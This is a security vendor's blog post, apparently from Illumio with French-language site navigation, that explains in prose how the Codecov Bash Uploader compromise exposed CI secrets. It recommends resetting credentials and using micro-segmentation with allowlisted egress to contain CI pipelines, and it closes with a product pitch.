/
Segmentation Zero Trust

Codecov Takeaways — Ce que nous savons jusqu'à présent

Not that anyone needed reminding so soon, but the recently announced breach of Codecov’s toolset, which supports Continuous Integration (CI) processes across many organisations, again highlights the vast density of interdependencies that exist today and the resultant exposure to supply chain attacks.

Further, the often implicit faith in software provided by trusted suppliers means that customers do not adequately test what an update is doing, both in terms of what it is doing locally on the host but also in terms of network connectivity and data transfer. All this means is that, more often than not, the software that is running in organisations is not fully understood.

How is this relevant to what happened with Codecov?

Codecov provides reporting capabilities that can be integrated into customers’ CI pipelines — specifically, their tools report on the amount of code that is executed as part of testing, helping identify gaps in the validation process. These metrics are then uploaded to their SaaS platform for reporting and analytics.

The data upload is facilitated by scripts known collectively as “Bash Uploaders,” which are executed as part of the CI process. These Uploader scripts, should they be tampered with, provide an opportunity for an attacker to not just redirect the upload to a server of their choice, but to also specify what data they want to be included, making anything available to the CI process potentially accessible.

In the case of Codecov, the initial compromise was through a leaking of Google Cloud Storage credentials made available via an error in Codecov’s docker image creation process. These credentials allowed the attacker to post a modified version of the Bash Uploader script, which they altered to allow them to harvest the contents of all environment variables available to the CI process in which it was executed and upload these to their own server.

Given that this modified script was available directly from Codecov’s site, it was presumably trusted by customers and downloaded and integrated with little validation. Environment variables in the CI process are typically used to insert relevant secrets into code to access the resources it needs at run time. The malicious Uploader script would thus have access to these and be able to transfer them to the attacker, providing them with a healthy harvest of credentials and other sensitive information.

Even without further persistent network access – and there is no indication yet as to whether the breach establishes this – these secrets are a treasure chest, given that they provide access to a number of internet-accessible resources, such as storage buckets, databases, and other cloud services that the associated applications used. These, too, are now likely compromised.

At a bare minimum, any organisation that believes they may have incorporated the compromised Bash Uploader scripts into their CI pipeline should, as a matter of urgency, go and reset all the secrets that this has access to. This will almost definitely require a redeployment of affected applications to ensure that they have the received updated secrets, but the overhead of this method is preferred to prolonging the exposure of stolen credentials.

Beyond the exfiltration of secrets, the persistent privileged access afforded to the CI pipeline is ripe for abuse. By definition, the pipeline’s responsibility is to generate new software builds and publish these to repositories. Compromise of the pipeline infrastructure itself affords the attacker the ability to alter the contents, potentially inserting backdoors for later use either on downstream systems or within generated artifacts. So how much rebuilding needs to be done in order to be confident that all traces of the attacker and their tentacles are removed?

Next, it’s worth looking at the network access available to the CI infrastructure. Typically, these have direct access to other key components, including but not limited to Version Control System, Monitoring Infrastructure, Automated Testing, Build Process, Configuration Management, and Continuous Deployment. Also, with the heavy usage of FOSS components, the CI pipeline will often need internet access to public repositories to pull in relevant dependencies.

With the dense connectivity requirements that the CI pipeline demands, can segmentation still serve as a valuable security control?

When considering the value of micro-segmentation, it can be presented in two ways:

  1. Micro-segmentation allows for high value assets to be ringfenced, ensuring their exposure to and from the rest of the network is limited, thus making it more difficult for an attacker to reach and exploit them.
  2. Micro-segmentation allows for every workload to have its own least-privilege access rule-based microperimeter encircling it. This ensures that, if it is compromised, the attack surface exposed to it is limited to only what it’s authorised to connect to – ultimately limiting what an attacker could do next.

One approach for making this relevant to the CI pipeline looks something like this:

  • The CI pipeline is definitely a high value asset and one that should be ring-fenced.
  • While it may have a number of internal and external dependencies from a connectivity perspective, these should be well understood and well defined.
  • Using this information, an allowlist-based micro-segmentation policy could be built to ensure that the CI pipeline only has access to and from these well-understood dependencies.
  • If internet access is required, then it should be allowed only for a list of approved repositories and not unfettered internet access. This limits access to only an explicitly defined list of destination sites and is an effective and often simple control to mitigate against C&C and data exfiltration attempts.

This protects the CI pipeline from being accessed by unauthorised devices or over unauthorised ports and protocols. It also ensures that, in the case of compromise of the CI pipeline, the exposure to the rest of the network is limited. Moreover, improved segmentation controls often go hand in hand with significantly better visibility into system interactions, providing richer data for incident detection and response teams to work with when investigating potential breaches.

At Illumio, we help customers leverage micro-segmentation to establish this containment and monitoring. Reach out to your account team to find out how we can support you.

Sujets connexes

Aucun article n'a été trouvé.

Articles connexes

Ce dont vous avez besoin pour créer une politique de segmentation Zero Trust
Segmentation Zero Trust

Ce dont vous avez besoin pour créer une politique de segmentation Zero Trust

Toute bonne solution de microsegmentation passera facilement de la découverte à la création et prendra pleinement en charge tous les flux de travail nécessaires à la rédaction efficace d'une politique de segmentation précise.

Zero Trust est désormais un must en matière de santé : points à retenir du HIMSS 2022
Segmentation Zero Trust

Zero Trust est désormais un must en matière de santé : points à retenir du HIMSS 2022

Le message principal en matière de cybersécurité lors de l'HIMSS 2022 était que la confiance zéro est désormais un must pour les soins de santé.

Quelles sont les erreurs dans les définitions du Zero Trust et comment les corriger
Segmentation Zero Trust

Quelles sont les erreurs dans les définitions du Zero Trust et comment les corriger

Trouvez la bonne définition de Zero Trust en découvrant pourquoi Zero Trust est une destination alors que le travail pour atteindre Zero Trust est un voyage.

Aucun article n'a été trouvé.

Supposez Breach.
Minimisez l'impact.
Augmentez la résilience.

Vous souhaitez en savoir plus sur la segmentation Zero Trust ?